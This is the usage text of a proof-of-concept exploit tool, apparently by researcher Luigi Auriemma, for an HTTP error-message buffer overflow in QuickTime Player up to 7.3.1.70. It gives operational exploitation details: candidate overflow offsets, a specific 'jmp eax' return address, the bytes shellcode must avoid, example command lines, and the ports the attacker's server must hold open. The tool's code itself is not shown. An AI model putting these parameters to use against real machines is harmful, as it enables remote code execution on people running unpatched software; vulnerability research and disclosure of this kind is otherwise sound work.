Quicktime Player <= 7.3.1.70 HTTP error message buffer-overflow 0.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org

Usage: quicktimebof.exe <offset> <retaddr> <shellcode>

- offset is the offset in the error messsage (so "HTTP/1.1 404" excluded) which
  will overwrite the return address, if in doubt try with 1926, 2134, 1870 and
  so on (this offset seems to change depending by the URL or the QTL file)
- retaddr is the return address you want to overwrite, a good value is
  0x675b29eb because when the function returns, EAX will point to the previous
  offset. 0x675b29eb has a "jmp eax" so the code flow will continue where are
  located the bytes of our return address "eb 29" which means "jmp 0x29".
  the tool will automatically fill this "space" if retaddr finishes with 0xeb
- shellcode is a file containing the C-style shellcode you want to execute
  (so something like "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9... and so on)
  remember that the only bytes which must be avoided are 0x00 0x0d 0x0a
  use "" to skip the usage of a shellcode

Example:
  quicktimebof 2134 0x41414141 ""
  quicktimebof 2134 0x675b29eb shellcode.txt

Remember that your ports 554 and 7070 must be closed and non-filtered!